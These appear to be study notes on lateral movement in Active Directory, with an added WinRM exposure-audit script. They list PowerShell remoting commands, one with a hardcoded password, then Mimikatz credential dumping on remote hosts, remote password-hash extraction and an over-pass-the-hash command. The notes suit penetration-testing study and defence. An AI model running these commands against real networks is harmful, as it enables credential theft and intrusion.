Lateral Movement in AD

Enable PowerShell Remoting with Enable-PSRemoting (from an elevated prompt) and make sure a firewall exception for WinRM (TCP 5985 for the default HTTP listener) is in place.
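Before switching remoting on (or when reviewing a host where someone already did), it helps to see exactly what Enable-PSRemoting exposes: the listener, the firewall opening, who may connect to the default endpoint and the transport settings. The following audit script is an added example and is not part of the original notes; the function name Get-RemotingExposure and the finding strings are my own, and it relies only on the built-in WSMan: drive, Get-NetFirewallRule and Get-PSSessionConfiguration. Run it from an elevated prompt on the host being checked.

```powershell
# Added example (not from the original notes): report the remoting surface a host
# exposes after Enable-PSRemoting. Run elevated; Get-PSSessionConfiguration needs it.
function Get-RemotingExposure {
    $winrm = Get-Service -Name WinRM -ErrorAction SilentlyContinue

    # Each listener is a container under WSMan:\localhost\Listener whose child
    # items carry Address ('*' = all interfaces), Transport (HTTP/HTTPS) and Port.
    $listeners = Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
        ForEach-Object {
            $props = @{}
            Get-ChildItem -Path $_.PSPath | ForEach-Object { $props[$_.Name] = $_.Value }
            [pscustomobject]@{ Address = $props.Address; Transport = $props.Transport; Port = $props.Port }
        }

    # The firewall rules created by Enable-PSRemoting live in this display group.
    $firewall = Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -ErrorAction SilentlyContinue |
        Where-Object Direction -eq 'Inbound' |
        Select-Object DisplayName, Enabled, Profile

    # Who may open a session on the default endpoint
    # (BUILTIN\Administrators and BUILTIN\Remote Management Users by default).
    $endpoint = Get-PSSessionConfiguration -Name 'Microsoft.PowerShell' -ErrorAction SilentlyContinue |
        Select-Object Name, Permission

    # Transport settings that should stay at their default of 'false'.
    $allowUnencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted -ErrorAction SilentlyContinue).Value
    $basicAuth        = (Get-Item WSMan:\localhost\Service\Auth\Basic -ErrorAction SilentlyContinue).Value

    # Findings are constructed labels for the conditions checked above.
    $findings = @(
        if (-not $listeners) { 'no WSMan listener: remoting is not reachable' }
        if ($listeners | Where-Object { $_.Transport -eq 'HTTP' -and $_.Address -eq '*' }) { 'HTTP listener bound to all addresses' }
        if ($firewall | Where-Object { "$($_.Enabled)" -eq 'True' -and "$($_.Profile)" -match 'Public' }) { 'inbound WinRM rule enabled on the Public profile' }
        if ("$allowUnencrypted" -eq 'true') { 'AllowUnencrypted is on' }
        if ("$basicAuth" -eq 'true') { 'Basic authentication is on' }
    )

    [pscustomobject]@{
        ServiceStatus    = $winrm.Status
        Listeners        = $listeners
        InboundRules     = $firewall
        Endpoint         = $endpoint
        AllowUnencrypted = $allowUnencrypted
        BasicAuth        = $basicAuth
        Findings         = $findings
    }
}

$report = Get-RemotingExposure
$report | Format-List
$report.Findings
```

The Permission column of the endpoint is the part most worth reading: anyone listed there with AccessAllowed can start the wsmprovhost.exe sessions described in the next section, so membership of Remote Management Users deserves the same scrutiny as local Administrators.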

Types

  • One-to-one -> interactive session with a single host; runs in a new process (wsmprovhost.exe) on the target and is stateful (variables and functions persist between commands)

  • One-to-many -> non-interactive; runs the command on many hosts in parallel and returns deserialized objects; not stateful

One-To-One

New-PSSession

$sess = New-PSSession -ComputerName <computer>

$sess = New-PSSession -ComputerName <computer> -Credential <domain\user>

Enter-PSSession -Session $sess

Enter-PSSession
Enter-PSSession -ComputerName <computer>

$password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("test", $password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred

One-To-Many

# one computer
Invoke-Command -ComputerName <computer> -ScriptBlock {whoami; hostname}

# run a local function on the remote computer (the function body is sent along with the command)
Invoke-Command -ComputerName <computer> -ScriptBlock ${function:<FunctionName>}

# multiple computers (one host name per line in the file)
Invoke-Command -ComputerName (Get-Content <txt file>) -ScriptBlock {whoami; hostname}

# Important: run a local script file on the remote computer (the file is read locally and sent to the target)
Invoke-Command -ComputerName <computer> -FilePath C:\script\Get-PassHashes.ps1

Using Mimikatz

Invoke-Mimikatz

# local machine
Invoke-Mimikatz -DumpCreds

# remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

Over Pass The Hash

# Over-pass-the-hash attack

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<hash> /run:powershell.exe"'
